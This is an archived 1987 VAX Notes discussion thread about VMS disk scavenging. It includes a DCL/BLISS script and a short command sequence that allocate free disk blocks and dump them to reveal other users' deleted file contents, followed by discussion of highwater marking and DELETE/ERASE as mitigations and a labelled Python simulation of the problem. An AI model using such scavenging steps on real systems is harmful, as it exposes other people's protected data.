
Conference noted::hackers_v1

Title: -={ H A C K E R S }=-
Notice: Write locked - see NOTED::HACKERS
Moderator: DIEHRD::MORRIS
Created: Thu Feb 20 1986
Last Modified: Mon Aug 03 1992
Last Successful Update: Fri Jun 06 1997
Number of topics: 680
Total number of notes: 5456

397.0. "random source of data ?" by VIDEO::OSMAN (and silos to fill before I feep, and silos to fill before I feep) Tue Feb 03 1987 16:30

$!
$!	Why does this command file print out what it does ?
$!
$!	It only exhibits its amazing behavior if you run it on a
$!	"busy" system.
$!
$!	Author: Eric Osman 2/3/87
$!
$ if f$search ("foo.b32") .eqs. "" then goto make_it
$ checksum foo.b32
$ if checksum$checksum .nes. "2018269209" then goto make_it
$ got_it:
$ ctr = 0
$ if f$search ("foo.bar") .nes. "" then delete foo.bar.*
$ create foo.bar
$ set file/ver=10 foo.bar
$ lup:
$ copy/allocate=1 nl: foo.bar
$ set file/end foo.bar
$ define/user sys$output nl:
$ run foo
g
set out log
set log sys$command:
e/ascii:200 foo
$ write sys$output "--------------------------------------------"
$ ctr = ctr + 1
$ if ctr .lt. 100 then goto lup
$ exit
$ make_it:
$ create foo.b32
module foo (
	main = beg,
	addressing_mode (
	    external = general,
	    nonexternal = general

	)) = begin

library 'sys$library:starlet';
routine map_mem =

	begin

	literal

	    ! Room for section pages
	    sec_len = 1000000;

	local

	    s,
	    beg_and_end : vector [2],
	    actual_beg_and_end : vector [2],
	    file_chan;

literal foo = 3000000;
    own
	    sec : ref vector [sec_len] initial (foo),
	INFAB: $FAB(FNM='foo.bar',
		fop = ufo	! user file open
		),	! input file fab
	INRAB: $RAB(			! input file rab
		    FAB=INFAB,
		    MBC=40,
		    USZ=512);

	if not (s = $OPEN(FAB=INFAB))
	then signal (.s);

	! Initialize beginning and ending addresses.
	!
	beg_and_end[0] = sec[0];
	beg_and_end[1] = sec[sec_len] - 1;

	! Get channel.
	!
	file_chan = .infab[fab$l_stv];

	if not (s = $crmpsc (
	    inadr = beg_and_end[0],
	    retadr = actual_beg_and_end[0],
	    acmode = 0,
	    flags = 0,
	    gsdnam = %ascid 'go_memory',
	    ident = 0,
	    relpag = 0,
	    chan = .file_chan,
	    pagcnt = 20,
	    vbn = 0,
	    prot = 0,
	    pfc = 0
	    ))
	then
	    signal (.s)
	else .s

	end;

routine beg = map_mem ();

end
eludom
$ bliss/deb foo
$ link/deb foo
$ checksum foo.b32
$ show sym checksum$checksum
$ goto got_it

397.1. "disk-scavenging.B32" by FROST::W_PIPER (bill piper) Thu Feb 05 1987 13:15 (4 lines)

Looks pretty dull if highwater-marking is turned on.  There are
easier ways to go a'scavenging if it's not.

-piper

397.2. "security problem ?" by VIDEO::OSMAN (and silos to fill before I feep, and silos to fill before I feep) Thu Feb 05 1987 22:05 (4 lines)

    But might it permit you to see data you weren't supposed to see?
    Like someone else's file that is protected against you ?
    
    /Eric

397.3. "highwater makes secure" by FROST::W_PIPER (bill piper) Fri Feb 06 1987 07:51 (17 lines)

Yes, it's a security hole, and that's why you turn on highwater-marking
if you're worried about it.  You'll only see others' deleted files, and
DELETE/ERASE will stifle that.

If you want to go big-time scavenging

  $ size = f$getdvi(disk,"Freeblocks") - f$getdvi(disk,"Cluster")
  $! if quotas exist, SIZE is what's left minus a couple
  $ copy /allocate='size' nl: foo.bar
  $ set file /end foo.bar
  $ dump foo.bar

I once recovered an accidentally deleted file with a similar scheme,
DUMPing and SEARCHing block by block until we zeroed in on it.  Not
elegant, but we got it back.

-piper
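
A simplified model of the behaviour discussed in 397.1 through 397.3, added here as an example and not code from any of the posters: a toy volume whose freed blocks keep their old contents, with highwater marking modelled (as an assumption) as reads beyond the highest block the owner has written returning zeros. The `Volume` class, the file names and the 16-byte block size are constructed for illustration.

```python
BLOCK = 16  # bytes per block in this toy model (VMS disk blocks are 512 bytes)

class Volume:
    """Toy volume (constructed model): freed blocks keep their old contents."""
    def __init__(self, nblocks, highwater=False):
        self.blocks = [bytes(BLOCK)] * nblocks
        self.free = list(range(nblocks))
        self.highwater = highwater
        self.files = {}  # name -> {"blocks": [...], "eof": n, "hwm": n}

    def create(self, name, allocate):  # like COPY/ALLOCATE=n NL: file
        got, self.free = self.free[:allocate], self.free[allocate:]
        self.files[name] = {"blocks": got, "eof": 0, "hwm": 0}

    def write(self, name, data):
        f = self.files[name]
        for i in range(0, len(data), BLOCK):
            chunk = data[i:i + BLOCK].ljust(BLOCK, b"\0")
            self.blocks[f["blocks"][f["hwm"]]] = chunk
            f["hwm"] += 1  # highwater mark: highest block actually written
        f["eof"] = f["hwm"]

    def set_eof_to_allocation(self, name):  # like SET FILE/END_OF_FILE
        self.files[name]["eof"] = len(self.files[name]["blocks"])

    def delete(self, name, erase=False):  # erase=True models DELETE/ERASE
        f = self.files.pop(name)
        if erase:
            for b in f["blocks"]:
                self.blocks[b] = bytes(BLOCK)
        self.free = f["blocks"] + self.free  # freed blocks are reused first

    def read(self, name):
        f = self.files[name]
        out = b""
        for i, b in enumerate(f["blocks"][:f["eof"]]):
            hidden = self.highwater and i >= f["hwm"]  # never written by owner
            out += bytes(BLOCK) if hidden else self.blocks[b]
        return out

def residue_visible(highwater, erase):
    """True if a new file's owner can read a deleted file's data."""
    vol = Volume(8, highwater=highwater)
    vol.create("payroll.dat", 2)
    vol.write("payroll.dat", b"SECRET-SALARY-42")
    vol.delete("payroll.dat", erase=erase)
    vol.create("foo.bar", 2)
    vol.set_eof_to_allocation("foo.bar")
    return b"SECRET" in vol.read("foo.bar")
```

Only the combination of highwater marking off and a plain delete leaves the old contents readable; either control on its own closes the gap in this model.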

397.4. "security VMS problem should be fixed!" by VIDEO::OSMAN (and silos to fill before I feep, and silos to fill before I feep) Mon Feb 09 1987 00:23 (6 lines)

If it's a security hole, then shouldn't high water marking or whatever
it is be the default ?  Let those customers that want a security problem
set it the dangerous way.  Let unwary customers have the secure
setting.

/Eric

397.5. "Digital had it 2 1/2 years ago !" by MARVIN::WARWICK (Village tours start here) Mon Feb 09 1987 05:55 (6 lines)

    
    High water marking is the default, as of VMS V4.0, when it was
    introduced. Most system managers turn it off, because it has quite
    an impact on performance.
    
    Trev